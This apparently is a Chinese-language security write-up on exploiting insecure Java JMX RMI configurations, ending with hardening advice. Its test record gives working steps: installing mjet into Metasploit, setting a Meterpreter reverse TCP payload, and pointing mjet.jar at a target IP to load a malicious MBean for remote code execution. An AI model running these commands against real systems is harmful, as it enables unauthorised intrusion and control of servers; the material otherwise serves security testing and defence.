Contents

#jmx基本概念
官方说法:
JMX(Java Management Extensions,即Java管理扩展)是一个为应用程序、设备、系统等植入管理功能的框架。JMX可以跨越一系列异构操作系统平台、系统体系结构和网络传输协议,灵活的开发无缝集成的系统、网络和服务管理应用
通常用来监控jvm会使用这个服务。对外开放一个端口提供服务。使用官方jconsole连上可以查看jvm应用的各种信息。

Java Management Extensions (JMX) Technology

#不安全配置

来自oracle官方文档:

Disabling Security
To disable both password authentication and SSL (namely to disable all security), you should set the following system properties when you start the Java VM.

com.sun.management.jmxremote.authenticate=false
com.sun.management.jmxremote.ssl=false

Caution - This configuration is insecure: any remote user who knows (or guesses) your port number and host name will be able to monitor and control your Java applications and platform. Furthermore, possible harm is not limited to the operations you define in your MBeans. A remote client could create a javax.management.loading.MLet MBean and use it to create new MBeans from arbitrary URLs, at least if there is no security manager. In other words, a rogue remote client could make your Java application execute arbitrary code.

Consequently, while disabling security might be acceptable for development, it is strongly recommended that you do not disable security for production systems.

当禁用代码执行的时候存在任意代码执行问题。
metaploit模块描述如下:

This module takes advantage a Java JMX interface insecure configuration, which would allow loading classes from any remote (HTTP) URL. JMX interfaces with authentication disabled (com.sun.management.jmxremote.authenticate=false) should be vulnerable, while interfaces with authentication enabled will be vulnerable only if a weak configuration is deployed (allowing to use javax.management.loading.MLet, having a security manager allowing to load a ClassLoader MBean, etc

当开启了密码认证的时候还需要其他限制条件才可以利用。

#漏洞利用程序
漏洞利用程序可以使用mjet。过程参考JMX RMI Exploit Demo

#测试记录
安装mjet

git clone  https://github.com/mogwaisec/mjet

Copy the "MBean" folder to "data/java/metasploit"
Copy java_mlet_server.rb to "modules/exploits/multi/misc/"

在kali 1.1.0中metasploit路径为/opt/metasploit/apps/pro/msf3

启动metasploit:

msf exploit(java_mlet_server) > use exploit/multi/misc/java_mlet_server 
msf exploit(java_mlet_server) > set payload java/meterpreter/reverse_tcp 
payload => java/meterpreter/reverse_tcp
msf exploit(java_mlet_server) > set LHOST 13.7.8.53
LHOST => 13.7.8.53
msf exploit(java_mlet_server) > set LPORT 29999
LPORT => 29999
msf exploit(java_mlet_server) > run
[*] Exploit running as background job.
[*] Started reverse handler on 13.7.8.53:29999 
msf exploit(java_mlet_server) > [*] Using URL: http://0.0.0.0:8080/2B7JthqVZW
[*]  Local IP: http://13.7.8.53:8080/2B7JthqVZW
[*] Server started.


或得payload url,作为u参数。

java -jar mjet/mjet.jar -p 9090 -u http://13.7.8.53:8080/2B7JthqVZW -t 42.91.1.1


msf获得权限

图片来自JMX RMI Exploit 实例

#测试失败记录
测试的时候发现如果不使用msf,自己架web服务提供恶意Mbean,jar包一定要配置对,如果配置错误的话,除非对方服务重启,不然每次都是加载第一次错误的包导致利用失败。

#启用安全的配置
So it’s important to keep in mind that setting java.rmi.server.hostname has no effect on whether or not this is an insecure configuration. If you actually want to secure your JMX RMI port, you have many options, such as (in decreasing order of preference):

Don’t pass com.sun.management.jmxremote.port. This will start a local-only JMX server, and you can get the connection address from com.sun.management.jmxremote.localConnectorAddress  http://docs.oracle.com/javase/6/docs/technotes/guides/management/agent.html
Enable SSL client certificate authentication
Enable password authentication and use SSL
Firewall your JMX RMI port
+ See more at: http://www.accuvant.com/blog/exploiting-jmx-rmi#sthash.AsAasfPW.dpuf

除了启用密码认证和SSL,还可以配置防火墙。文中还提到了不要指定端口,以及设置java.rmi.server.hostname是不安全的配置,这个点没有具体测试。

#参考资料
Exploiting JMX RMI
jmx配置官方文档

Contents